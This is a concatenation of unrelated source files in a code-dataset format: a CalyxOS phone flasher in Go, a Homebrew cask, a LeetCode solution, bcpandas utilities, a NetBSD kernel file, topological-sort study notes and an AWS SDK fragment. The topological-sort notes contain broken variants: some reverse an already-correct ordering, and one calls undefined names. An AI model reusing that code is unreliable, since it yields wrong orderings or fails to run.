return strings.Trim(string(out), "[]\n\r")
}
func flashDevices(devices map[string]string) {
var wg sync.WaitGroup
for serialNumber, device := range devices {
wg.Add(1)
go func(serialNumber, device string) {
defer wg.Done()
platformToolCommand := *adb
platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "reboot", "bootloader")
_ = platformToolCommand.Run()
fmt.Println("Unlocking " + device + " " + serialNumber + " bootloader...")
warnln("5. Please use the volume and power keys on the device to unlock the bootloader")
if device == "jasmine" || device == "walleye" {
fmt.Println()
warnln(" 5a. Once " + device + " " + serialNumber + " boots, disconnect its cable and power it off")
warnln(" 5b. Then, press volume down + power to boot it into fastboot mode, and connect the cable again.")
fmt.Println("The installation will resume automatically")
}
for i := 0; getVar("unlocked", serialNumber) != "yes"; i++ {
platformToolCommand = *fastboot
platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "flashing", "unlock")
_ = platformToolCommand.Start()
time.Sleep(30 * time.Second)
if i >= 2 {
errorln("Failed to unlock "+device+" "+serialNumber+" bootloader", false)
return
}
}
fmt.Println("Flashing " + device + " " + serialNumber + " bootloader...")
flashAll := exec.Command("." + string(os.PathSeparator) + "flash-all" + func() string {
if OS == "windows" {
return ".bat"
} else {
return ".sh"
}
}())
flashAll.Dir = deviceFactoryFolderMap[device]
flashAll.Stderr = os.Stderr
err := flashAll.Run()
if err != nil {
errorln("Failed to flash "+device+" "+serialNumber, false)
errorln(err.Error(), false)
return
}
fmt.Println("Locking " + device + " " + serialNumber + " bootloader...")
warnln("6. Please use the volume and power keys on the device to lock the bootloader")
if device == "jasmine" || device == "walleye" {
fmt.Println()
warnln(" 6a. Once " + device + " " + serialNumber + " boots, disconnect its cable and power it off")
warnln(" 6b. Then, press volume down + power to boot it into fastboot mode, and connect the cable again.")
fmt.Println("The installation will resume automatically")
}
for i := 0; getVar("unlocked", serialNumber) != "no"; i++ {
platformToolCommand = *fastboot
platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "flashing", "lock")
_ = platformToolCommand.Start()
time.Sleep(30 * time.Second)
if i >= 2 {
errorln("Failed to lock "+device+" "+serialNumber+" bootloader", false)
return
}
}
fmt.Println("Rebooting " + device + " " + serialNumber + "...")
platformToolCommand = *fastboot
platformToolCommand.Args = append(platformToolCommand.Args, "-s", serialNumber, "reboot")
_ = platformToolCommand.Start()
warnln("7. Disable OEM unlocking from Developer Options after setting up your device")
}(serialNumber, device)
}
wg.Wait()
fmt.Println()
fmt.Println(Blue("Flashing complete"))
}
func killPlatformTools() {
_, err := os.Stat(adb.Path)
if err == nil {
platformToolCommand := *adb
platformToolCommand.Args = append(platformToolCommand.Args, "kill-server")
_ = platformToolCommand.Run()
}
if OS == "windows" {
_ = exec.Command("taskkill", "/IM", "fastboot.exe", "/F").Run()
}
}
func downloadFile(url string) error {
fmt.Println("Downloading " + url)
resp, err := http.Get(url)
if err != nil {
return err
}
defer resp.Body.Close()
out, err := os.Create(path.Base(url))
if err != nil {
return err
}
defer out.Close()
counter := &WriteCounter{}
_, err = io.Copy(out, io.TeeReader(resp.Body, counter))
fmt.Println()
return err
}
func extractZip(src string, destination string) ([]string, error) {
fmt.Println("Extracting " + src)
var filenames []string
r, err := zip.OpenReader(src)
if err != nil {
return filenames, err
}
defer r.Close()
for _, f := range r.File {
fpath := filepath.Join(destination, f.Name)
if !strings.HasPrefix(fpath, filepath.Clean(destination)+string(os.PathSeparator)) {
return filenames, fmt.Errorf("%s is an illegal filepath", fpath)
}
filenames = append(filenames, fpath)
if f.FileInfo().IsDir() {
os.MkdirAll(fpath, os.ModePerm)
continue
}
if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
return filenames, err
}
outFile, err := os.OpenFile(fpath,
os.O_WRONLY|os.O_CREATE|os.O_TRUNC,
f.Mode())
if err != nil {
return filenames, err
}
rc, err := f.Open()
if err != nil {
return filenames, err
}
_, err = io.Copy(outFile, rc)
outFile.Close()
rc.Close()
if err != nil {
return filenames, err
}
}
return filenames, nil
}
func verifyZip(zipfile, sha256sum string) error {
fmt.Println("Verifying " + zipfile)
f, err := os.Open(zipfile)
if err != nil {
return err
}
defer f.Close()
h := sha256.New()
if _, err := io.Copy(h, f); err != nil {
return err
}
sum := hex.EncodeToString(h.Sum(nil))
if sha256sum == sum {
return nil
}
return errors.New("sha256sum mismatch")
}
type WriteCounter struct {
Total uint64
}
func (wc *WriteCounter) Write(p []byte) (int, error) {
n := len(p)
wc.Total += uint64(n)
wc.PrintProgress()
return n, nil
}
func (wc WriteCounter) PrintProgress() {
fmt.Printf("\r%s", strings.Repeat(" ", 35))
fmt.Printf("\rDownloading... %s downloaded", Bytes(wc.Total))
}
func logn(n, b float64) float64 {
return math.Log(n) / math.Log(b)
}
func humanateBytes(s uint64, base float64, sizes []string) string {
if s < 10 {
return fmt.Sprintf("%d B", s)
}
e := math.Floor(logn(float64(s), base))
suffix := sizes[int(e)]
val := math.Floor(float64(s)/math.Pow(base, e)*10+0.5) / 10
f := "%.0f %s"
if val < 10 {
f = "%.1f %s"
}
return fmt.Sprintf(f, val, suffix)
}
func Bytes(s uint64) string {
sizes := []string{"B", "kB", "MB", "GB", "TB", "PB", "EB"}
return humanateBytes(s, 1000, sizes)
}
|
GO
|
Apache-2.0
|
CalyxOS/device-flasher/flasher.go
|
55cb8496-7280-4804-8b60-23fbabbee427
|
[]
|
[]
|
cask 'qownnotes' do
version '19.6.3,b4310-141410'
sha256 'f193f7bcbcd6b36ecae4a88da3f15d523bc243649eff3471ff40814c9a0bfb67'
# github.com/pbek/QOwnNotes was verified as official when first introduced to the cask
url "https://github.com/pbek/QOwnNotes/releases/download/macosx-#{version.after_comma}/QOwnNotes-#{version.before_comma}.dmg"
appcast 'https://www.qownnotes.org/api/v1/last_release/QOwnNotes/macosx.json'
name 'QOwnNotes'
homepage 'https://www.qownnotes.org/'
auto_updates true
depends_on macos: '>= :sierra'
app 'QOwnNotes.app'
end
|
Ruby
|
BSD-2-Clause
|
mcdado/homebrew-cask/Casks/qownnotes.rb
|
a82458a3-63c0-4355-bc17-d339d1665c99
|
[{"tag": "USERNAME", "value": "pbek", "start": 144, "end": 148, "context": "3bc243649eff3471ff40814c9a0bfb67'\n\n # github.com/pbek/QOwnNotes was verified as official when first int"}, {"tag": "USERNAME", "value": "pbek", "start": 244, "end": 248, "context": " introduced to the cask\n url \"https://github.com/pbek/QOwnNotes/releases/download/macosx-#{version.afte"}]
|
[{"tag": "USERNAME", "value": "pbek", "start": 144, "end": 148, "context": "3bc243649eff3471ff40814c9a0bfb67'\n\n # github.com/pbek/QOwnNotes was verified as official when first int"}, {"tag": "USERNAME", "value": "pbek", "start": 244, "end": 248, "context": " introduced to the cask\n url \"https://github.com/pbek/QOwnNotes/releases/download/macosx-#{version.afte"}]
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace LeetCode.Challenge
{
/// <summary>
/// https://leetcode.com/explore/challenge/card/november-leetcoding-challenge/566/week-3-november-15th-november-21st/3534/
///
/// </summary>
internal class Nov17
{
public class Solution
{
public int MirrorReflection(int p, int q)
{
if (q == 0)
return 0;
var qpos = 0;
for (var i = 0; ; i++)
{
qpos += q;
if (qpos % p == 0)
{
if (i % 2 == 1)
return 2;
else
{
var div = qpos / p;
if (div % 2 == 0)
return 0;
return 1;
}
}
}
return -1;
}
}
}
}
|
C#
|
MIT
|
viacheslave/algo/leetcode-challenge/c#/Problems/2020/11/Nov17.cs
|
a4336b04-786e-4c5f-b876-a37306e01a6c
|
[]
|
[]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 3 23:07:15 2019
@author: ydima
"""
import logging
import os
from pathlib import Path
import random
import shlex
import string
from subprocess import PIPE, Popen
import tempfile
from typing import Dict, List, Optional, Union
import pandas as pd
from .constants import (
DIRECTIONS,
IN,
IS_WIN32,
NEWLINE,
OUT,
QUERY,
QUERYOUT,
SQLCHAR,
TABLE,
VIEW,
BCPandasException,
BCPandasValueError,
read_data_settings,
sql_collation,
)
logger = logging.getLogger(__name__)
def bcp(
sql_item: str,
direction: str,
flat_file: str,
creds,
sql_type: str = "table",
schema: str = "dbo",
format_file_path: str = None,
batch_size: int = None,
col_delimiter: str = None,
row_terminator: str = None,
bcp_path: Union[str, Path] = None,
error_file_path: str = None
):
"""
See https://docs.microsoft.com/en-us/sql/tools/bcp-utility
"""
combos = {TABLE: [IN, OUT], QUERY: [QUERYOUT], VIEW: [IN, OUT]}
direc = direction.lower()
# validation
if direc not in DIRECTIONS:
raise BCPandasValueError(
f"Param 'direction' must be one of {DIRECTIONS}, you passed {direc}"
)
if direc not in combos[sql_type]:
raise BCPandasValueError(
f"Wrong combo of direction and SQL object, you passed {sql_type} and {direc} ."
)
# auth
if creds.with_krb_auth:
auth = ["-T"]
else:
auth = ["-U", creds.username, "-P", creds.password]
# prepare SQL item string
if sql_type == QUERY:
# remove newlines for queries, otherwise messes up BCP
sql_item_string = quote_this("".join(sql_item.splitlines()))
else:
sql_item_string = f"{schema}.{sql_item}"
# construct BCP command
bcp_command = [
"bcp" if bcp_path is None else quote_this(str(bcp_path)),
sql_item_string,
direc,
flat_file,
"-S",
creds.server,
"-d",
creds.database,
"-q", # Executes the SET QUOTED_IDENTIFIERS ON statement, needed for Azure SQL DW
"-e",
error_file_path
] + auth
if batch_size:
bcp_command += ["-b", str(batch_size)]
# formats
if direc == IN:
bcp_command += ["-f", format_file_path]
elif direc in (OUT, QUERYOUT):
bcp_command += [
"-c", # marking as character data, not Unicode (maybe make as param?)
quote_this(
f"-t{read_data_settings['delimiter'] if col_delimiter is None else col_delimiter}"
),
quote_this(
f"-r{read_data_settings['newline'] if row_terminator is None else row_terminator}"
),
]
# execute
bcp_command_log = [c if c != creds.password else "[REDACTED]" for c in bcp_command]
logger.info(f"Executing BCP command now... \nBCP command is: {bcp_command_log}")
ret_code = run_cmd(bcp_command)
if ret_code:
raise BCPandasException(f"Bcp command failed with exit code {ret_code}")
def get_temp_file() -> str:
"""
Returns full path to a temporary file without creating it.
"""
tmp_dir = tempfile.gettempdir()
file_path = os.path.join(
tmp_dir, "".join(random.choices(string.ascii_letters + string.digits, k=21))
)
return file_path
def _escape(input_string: str) -> str:
"""
Adopted from https://github.com/titan550/bcpy/blob/master/bcpy/format_file_builder.py#L25
"""
return (
input_string.replace('"', '\\"')
.replace("'", "\\'")
.replace("\r", "\\r")
.replace("\n", "\\n")
)
def build_format_file(
df: pd.DataFrame, delimiter: str, db_cols_order: Optional[Dict[str, int]] = None
) -> str:
"""
Creates the non-xml SQL format file. Puts 4 spaces between each section.
See https://docs.microsoft.com/en-us/sql/relational-databases/import-export/non-xml-format-files-sql-server
for the specification of the file.
# TODO add params/options to control:
# - the char type (not just SQLCHAR),
Parameters
----------
df : pandas DataFrame
delimiter : a valid delimiter character
db_cols_order : dict, optional
Dict of {database column name -> ordinal position of the column}.
Maps existing columns in the database to their ordinal position, i.e. the order of the columns in the db table.
1-indexed, so the first columns is 1, second is 2, etc.
Only needed if the order of the columns in the dataframe doesn't match the database.
Returns
-------
A string containing the format file
"""
_space = " " * 4
format_file_str = f"9.0\n{len(df.columns)}\n" # Version and Number of columns
for col_num, col_name in enumerate(df.columns, start=1):
# last col gets a newline sep
_delim = delimiter if col_num != len(df.columns) else NEWLINE
_line = _space.join(
[
str(col_num), # Host file field order
SQLCHAR, # Host file data type
str(0), # Prefix length
str(0), # Host file data length
f'"{_escape(_delim)}"', # Terminator (see note below)
str(
col_num if not db_cols_order else db_cols_order[str(col_name)]
), # Server column order
str(col_name), # Server column name, optional as long as not blank
sql_collation, # Column collation
"\n",
]
)
format_file_str += _line
# FYI very important to surround the Terminator with quotes, otherwise BCP fails with:
# "Unexpected EOF encountered in BCP data-file". Hugely frustrating bug.
return format_file_str
def quote_this(this: str, skip: bool = False) -> str:
"""
OS-safe way to quote a string.
Returns the string with quotes around it.
On Windows ~~it's double quotes~~ we skip quoting,
on Linux it's single quotes.
"""
if isinstance(this, str):
if IS_WIN32:
return this # TODO maybe change?
else:
return shlex.quote(this)
else:
return this
def run_cmd(cmd: List[str]) -> int:
"""
Runs the given command.
Prints STDOUT in real time, prints STDERR when command is complete,
and logs both STDOUT and STDERR.
Paramters
---------
cmd : list of str
The command to run, to be submitted to `subprocess.Popen()`
Returns
-------
The exit code of the command
"""
if IS_WIN32:
with_shell = False
else:
with_shell = True
cmd = " ".join(cmd) # type: ignore
proc = Popen(cmd, stdout=PIPE, stderr=PIPE, encoding="utf-8", errors="utf-8", shell=with_shell,)
# live stream STDOUT
while True:
outs = proc.stdout.readline()
if outs:
print(outs, end="")
logger.info(outs)
if proc.poll() is not None and outs == "":
break
errs = proc.stderr.readlines()
if errs:
print(errs, end="")
logger.error(errs)
return proc.returncode
|
Python
|
MIT
|
alon-r/bcpandas/bcpandas/utils.py
|
a376a2b1-d5b8-4f05-95c8-5740f7f41cab
|
[{"tag": "USERNAME", "value": "ydima", "start": 74, "end": 79, "context": "\"\"\"\nCreated on Sat Aug 3 23:07:15 2019\n\n@author: ydima\n\"\"\"\n\nimport logging\nimport os\nfrom pathlib import"}]
|
[{"tag": "USERNAME", "value": "ydima", "start": 74, "end": 79, "context": "\"\"\"\nCreated on Sat Aug 3 23:07:15 2019\n\n@author: ydima\n\"\"\"\n\nimport logging\nimport os\nfrom pathlib import"}]
|
/* $NetBSD: svr4_32_sockio.c,v 1.2.10.1 2002/07/22 14:53:27 lukem Exp $ */
/*-
* Copyright (c) 1995 The NetBSD Foundation, Inc.
* All rights reserved.
*
* This code is derived from software contributed to The NetBSD Foundation
* by Christos Zoulas.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the NetBSD
* Foundation, Inc. and its contributors.
* 4. Neither the name of The NetBSD Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
* ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <sys/cdefs.h>
__KERNEL_RCSID(0, "$NetBSD: svr4_32_sockio.c,v 1.2.10.1 2002/07/22 14:53:27 lukem Exp $");
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/systm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/ioctl.h>
#include <sys/termios.h>
#include <sys/tty.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <net/if.h>
#include <sys/malloc.h>
#include <sys/syscallargs.h>
#include <compat/svr4_32/svr4_32_types.h>
#include <compat/svr4_32/svr4_32_util.h>
#include <compat/svr4_32/svr4_32_signal.h>
#include <compat/svr4_32/svr4_32_lwp.h>
#include <compat/svr4_32/svr4_32_ucontext.h>
#include <compat/svr4_32/svr4_32_syscallargs.h>
#include <compat/svr4_32/svr4_32_stropts.h>
#include <compat/svr4_32/svr4_32_ioctl.h>
#include <compat/svr4_32/svr4_32_sockio.h>
static int bsd_to_svr4_flags __P((int));
#define bsd_to_svr4_flag(a) \
if (bf & __CONCAT(I,a)) sf |= __CONCAT(SVR4_I,a)
static int
bsd_to_svr4_flags(bf)
int bf;
{
int sf = 0;
bsd_to_svr4_flag(FF_UP);
bsd_to_svr4_flag(FF_BROADCAST);
bsd_to_svr4_flag(FF_DEBUG);
bsd_to_svr4_flag(FF_LOOPBACK);
bsd_to_svr4_flag(FF_POINTOPOINT);
bsd_to_svr4_flag(FF_NOTRAILERS);
bsd_to_svr4_flag(FF_RUNNING);
bsd_to_svr4_flag(FF_NOARP);
bsd_to_svr4_flag(FF_PROMISC);
bsd_to_svr4_flag(FF_ALLMULTI);
bsd_to_svr4_flag(FF_MULTICAST);
return sf;
}
int
svr4_32_sock_ioctl(fp, p, retval, fd, cmd, data)
struct file *fp;
struct proc *p;
register_t *retval;
int fd;
u_long cmd;
caddr_t data;
{
int error;
int (*ctl) __P((struct file *, u_long, caddr_t, struct proc *)) =
fp->f_ops->fo_ioctl;
*retval = 0;
switch (cmd) {
case SVR4_SIOCGIFNUM:
{
struct ifnet *ifp;
struct ifaddr *ifa;
int ifnum = 0;
/*
* This does not return the number of physical
* interfaces (if_index), but the number of interfaces
* + addresses like ifconf() does, because this number
* is used by code that will call SVR4_SIOCGIFCONF to
* find the space needed for SVR4_SIOCGIFCONF. So we
* count the number of ifreq entries that the next
* SVR4_SIOCGIFCONF will return. Maybe a more correct
* fix is to make SVR4_SIOCGIFCONF return only one
* entry per physical interface?
*/
for (ifp = ifnet.tqh_first;
ifp != 0; ifp = ifp->if_list.tqe_next)
if ((ifa = ifp->if_addrlist.tqh_first) == NULL)
ifnum++;
else
for (;ifa != NULL;
ifa = ifa->ifa_list.tqe_next)
ifnum++;
DPRINTF(("SIOCGIFNUM %d\n", ifnum));
return copyout(&ifnum, data, sizeof(ifnum));
}
case SVR4_32_SIOCGIFFLAGS:
{
struct ifreq br;
struct svr4_32_ifreq sr;
if ((error = copyin(data, &sr, sizeof(sr))) != 0)
return error;
(void) strncpy(br.ifr_name, sr.svr4_ifr_name,
sizeof(br.ifr_name));
if ((error = (*ctl)(fp, SIOCGIFFLAGS,
(caddr_t) &br, p)) != 0) {
DPRINTF(("SIOCGIFFLAGS %s: error %d\n",
sr.svr4_ifr_name, error));
return error;
}
sr.svr4_ifr_flags = bsd_to_svr4_flags(br.ifr_flags);
DPRINTF(("SIOCGIFFLAGS %s = %x\n",
sr.svr4_ifr_name, sr.svr4_ifr_flags));
return copyout(&sr, data, sizeof(sr));
}
case SVR4_32_SIOCGIFCONF:
{
struct svr4_32_ifconf sc;
struct ifconf ifc;
if ((error = copyin(data, &sc, sizeof(sc))) != 0)
return error;
DPRINTF(("ifreq %ld svr4_32_ifreq %ld ifc_len %d\n",
(unsigned long)sizeof(struct ifreq),
(unsigned long)sizeof(struct svr4_32_ifreq),
sc.svr4_32_ifc_len));
ifc.ifc_len = sc.svr4_32_ifc_len;
ifc.ifc_buf = (caddr_t)(uintptr_t)sc.ifc_ifcu.ifcu_buf;
if ((error = (*ctl)(fp, OSIOCGIFCONF,
(caddr_t) &ifc, p)) != 0)
return error;
DPRINTF(("SIOCGIFCONF\n"));
return 0;
}
default:
DPRINTF(("Unknown svr4_32 sockio %lx\n", cmd));
return 0; /* ENOSYS really */
}
}
|
C
|
BSD-3-Clause
|
MarginC/kame/netbsd/sys/compat/svr4_32/svr4_32_sockio.c
|
5891005a-bb7c-4509-b93c-5d5b3490e249
|
[{"tag": "NAME", "value": "Christos Zoulas", "start": 239, "end": 254, "context": "ftware contributed to The NetBSD Foundation\n * by Christos Zoulas.\n *\n * Redistribution and use in source and binar"}]
|
[{"tag": "NAME", "value": "Christos Zoulas", "start": 239, "end": 254, "context": "ftware contributed to The NetBSD Foundation\n * by Christos Zoulas.\n *\n * Redistribution and use in source and binar"}]
|
#---------------------------------------------------------------
# ALGORITHM DEMO : TOPLOGICAL SORT
#---------------------------------------------------------------
# Topological Sort is a algorithm can find "ordering" on an "order dependency" graph
# Concept
# https://blog.techbridge.cc/2020/05/10/leetcode-topological-sort/
# https://alrightchiu.github.io/SecondRound/graph-li-yong-dfsxun-zhao-dagde-topological-sorttuo-pu-pai-xu.html
# V0
# IDEA : implement topologicalSortUtil, topologicalSort, and addEdge methods
# step 1) maintain a stack, save "ordering" nodes in it (and return in final step)
# step 2) init visited as [False]*self.V (all nodes are NOT visited yet)
# step 3) iterate over all vertices in graph, if not visited, then run topologicalSortUtil
# step 4) return result (stack)
from collections import defaultdict
class Graph:
def __init__(self, vertices):
self.graph = defaultdict(list)
self.V = vertices
# for build graph
def addEdge(self, u, v):
self.graph[u].append(v)
def topologicalSortUtil(self, v, visited, stack):
visited[v] = True
### NOTE this !!! (self.graph[v])
for k in self.graph[v]:
if visited[k] == False:
self.topologicalSortUtil(k, visited, stack)
# stack.insert(0,v) # instead of insert v to idx = 0, we can still append v to stack and reverse it and return (e.g. return stack[::-1])
"""
### NOTE !! stack.append(v) is wrong, we SHOULD use stack.insert(0,v)
"""
stack.insert(0,v)
def topologicalSort(self):
visited = [False] * self.V
stack = []
### NOTE this !!! (range(self.V))
for v in range(self.V):
# call tologicalSortUtil only if visited[v] == False (the vertice is not visited yet)
if visited[v] == False:
self.topologicalSortUtil(v, visited, stack)
# return the result in inverse order
return stack[::-1]
### TEST
{"A": 0, "B":1, "C":2, "D": 3}
v = 4
g = Graph(v)
g.addEdge(0, 1)
g.addEdge(0, 2)
g.addEdge(2, 3)
g.addEdge(3, 1)
print (g.graph)
# ans should be TableB, TableD, TableC, TableA.
r = g.topologicalSort()
print (r)
# V0'
from collections import defaultdict
class Graph:
def __init__(self, v):
self.graph = defaultdict(list)
self.v = v
def addEdge(self, a, b):
self.graph[a].append(b)
def topologicalSortUtil(self, x, visited, stack):
# V1
if visited[x]:
return
for k in self.graph[x]:
self.topologicalSortUtil(k, visited, stack)
visited[x] = True
stack.insert(0, x)
# V2
# visited[v] = True
# ### NOTE this !!! (self.graph[v])
# for k in self.graph[v]:
# if visited[k] == False:
# self.topologicalSortUtil(k, visited, stack)
# # stack.insert(0,v) # instead of insert v to idx = 0, we can still append v to stack and reverse it and return (e.g. return stack[::-1])
# """
# ### NOTE !! stack.append(v) is wrong, we SHOULD use stack.insert(0,v)
# """
# stack.insert(0,v)
def topologicalSort(self):
visited = [False] * self.v
stack = []
for x in range(self.v):
if not visited[x]:
self.topologicalSortUtil(x, visited, stack)
print ("stack = " + str(stack))
return stack[::-1]
# V0''
# IDEA : implement topologicalSortUtil, topologicalSort, and addEdge methods
from collections import defaultdict
class Graph:
def __init__(self,vertices):
self.graph = defaultdict(list)
self.V = vertices
# for testing (build graph)
def addEdge(self,u,v):
self.graph[u].append(v)
def topologicalSortUtil(self,v,visited,stack):
visited[v] = True
for i in self.graph[v]:
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
stack.insert(0,v)
def topologicalSort(self):
visited = [False]*self.V
stack =[]
for i in range(self.V):
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
print (stack)
# V1
# https://www.geeksforgeeks.org/topological-sorting/
# Python program to print topological sorting of a DAG
from collections import defaultdict
class Graph:
def __init__(self, vertices):
self.graph = defaultdict(list) # dictionary containing adjacency List
self.V = vertices # No. of vertices
# function to add an edge to graph
def addEdge(self, u, v):
self.graph[u].append(v)
# A recursive function used by topologicalSort
def topologicalSortUtil(self, v, visited, stack):
# Mark the current node as visited.
visited[v] = True
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i] == False:
self.topologicalSortUtil(i, visited, stack)
# Push current vertex to stack which stores result
#stack.append(v)
stack.insert(0,v)
# The function to do Topological Sort. It uses recursive
# topologicalSortUtil()
def topologicalSort(self):
# Mark all the vertices as not visited
visited = [False]*self.V
stack = []
# Call the recursive helper function to store Topological
# Sort starting from all vertices one by one
for i in range(self.V):
if visited[i] == False:
self.topologicalSortUtil(i, visited, stack)
# Print contents of the stack
print(stack[::-1]) # return list in reverse order
# TEST
# Driver Code
# g = Graph(6)
# g.addEdge(5, 2)
# g.addEdge(5, 0)
# g.addEdge(4, 0)
# g.addEdge(4, 1)
# g.addEdge(2, 3)
# g.addEdge(3, 1)
#
# print ("Following is a Topological Sort of the given graph")
#
# # Function Call
# g.topologicalSort()
# V1
# https://github.com/TheAlgorithms/Python/blob/master/sorts/topological_sort.py
"""Topological Sort."""
# a
# / \
# b c
# / \
# d e
# edges = {"a": ["c", "b"], "b": ["d", "e"], "c": [], "d": [], "e": []}
# vertices = ["a", "b", "c", "d", "e"]
class Graph:
def topological_sort(self, start, visited, sort):
"""Perform topological sort on a directed acyclic graph."""
current = start
# add current to visited
visited.append(current)
neighbors = edges[current]
for neighbor in neighbors:
# if neighbor not in visited, visit
if neighbor not in visited:
sort = topological_sort(neighbor, visited, sort)
# if all neighbors visited add current to sort
sort.append(current)
# if all vertices haven't been visited select a new one to visit
if len(visited) != len(vertices):
for vertice in vertices:
if vertice not in visited:
sort = topological_sort(vertice, visited, sort)
# return sort
return sort
# TEST
# edges = {"a": ["c", "b"], "b": ["d", "e"], "c": [], "d": [], "e": []}
# vertices = ["a", "b", "c", "d", "e"]
# sort = topological_sort("a", [], [])
# print(sort)
# V1'
# http://www.runoob.com/python3/python-topological-sorting.html
class Graph:
from collections import defaultdict
def __init__(self,vertices):
self.graph = defaultdict(list)
self.V = vertices
def addEdge(self,u,v):
self.graph[u].append(v)
def topologicalSortUtil(self,v,visited,stack):
visited[v] = True
for i in self.graph[v]:
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
stack.insert(0,v)
def topologicalSort(self):
visited = [False]*self.V
stack =[]
for i in range(self.V):
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
print (stack)
# TEST
# g= Graph(6)
# g.addEdge(5, 2);
# g.addEdge(5, 0);
# g.addEdge(4, 0);
# g.addEdge(4, 1);
# g.addEdge(2, 3);
# g.addEdge(3, 1);
# print ("output of Topological Sort ")
# g.topologicalSort()
# [5, 4, 2, 3, 1, 0]
# V2
# https://zhuanlan.zhihu.com/p/69858335
def topoSort(graph):
in_degrees = dict((u,0) for u in graph) # init (value with 0)
num = len(in_degrees)
for u in graph:
for v in graph[u]:
in_degrees[v] += 1
Q = [u for u in in_degrees if in_degrees[u] == 0]
Seq = []
while Q:
u = Q.pop()
Seq.append(u)
for v in graph[u]:
in_degrees[v] -= 1
if in_degrees[v] == 0:
Q.append(v)
if len(Seq) == num:
return Seq
else:
return None
# TEST
# G = {
# 'a':'bf',
# 'b':'cdf',
# 'c':'d',
# 'd':'ef',
# 'e':'f',
# 'f':''
# }
# print(topoSort(G))
# ['a', 'b', 'c', 'd', 'e', 'f']
# V3
# https://www.educative.io/courses/grokking-the-coding-interview/m25rBmwLV00
from collections import deque
def topological_sort(vertices, edges):
sortedOrder = []
if vertices <= 0:
return sortedOrder
# a. Initialize the graph
inDegree = {i: 0 for i in range(vertices)} # count of incoming edges
graph = {i: [] for i in range(vertices)} # adjacency list graph
# b. Build the graph
for edge in edges:
parent, child = edge[0], edge[1]
graph[parent].append(child) # put the child into it's parent's list
inDegree[child] += 1 # increment child's inDegree
# c. Find all sources i.e., all vertices with 0 in-degrees
sources = deque()
for key in inDegree:
if inDegree[key] == 0:
sources.append(key)
# d. For each source, add it to the sortedOrder and subtract one from all of its children's in-degrees
# if a child's in-degree becomes zero, add it to the sources queue
while sources:
vertex = sources.popleft()
sortedOrder.append(vertex)
for child in graph[vertex]: # get the node's children to decrement their in-degrees
inDegree[child] -= 1
if inDegree[child] == 0:
sources.append(child)
# topological sort is not possible as the graph has a cycle
if len(sortedOrder) != vertices:
return []
return sortedOrder
# TEST
# def main():
# print("Topological sort: " +
# str(topological_sort(4, [[3, 2], [3, 0], [2, 0], [2, 1]])))
# print("Topological sort: " +
# str(topological_sort(5, [[4, 2], [4, 3], [2, 0], [2, 1], [3, 1]])))
# print("Topological sort: " +
# str(topological_sort(7, [[6, 4], [6, 2], [5, 3], [5, 4], [3, 0], [3, 1], [3, 2], [4, 1]])))
#main()
|
Python
|
Unlicense
|
yennanliu/Python_basics/algorithm/python/topological_sort.py
|
8ef4c182-0451-4f58-9cb8-a43882a28ac3
|
[]
|
[]
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package finspace
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Adds metadata tags to a FinSpace resource.
func (c *Client) TagResource(ctx context.Context, params *TagResourceInput, optFns ...func(*Options)) (*TagResourceOutput, error) {
if params == nil {
params = &TagResourceInput{}
}
result, metadata, err := c.invokeOperation(ctx, "TagResource", params, optFns, addOperationTagResourceMiddlewares)
if err != nil {
return nil, err
}
out := result.(*TagResourceOutput)
out.ResultMetadata = metadata
return out, nil
}
type TagResourceInput struct {
// The Amazon Resource Name (ARN) for the resource.
//
// This member is required.
ResourceArn *string
// One or more tags to be assigned to the resource.
//
// This member is required.
Tags map[string]string
}
type TagResourceOutput struct {
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
}
func addOperationTagResourceMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsRestjson1_serializeOpTagResource{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsRestjson1_deserializeOpTagResource{}, middleware.After)
if err != nil {
return err
}
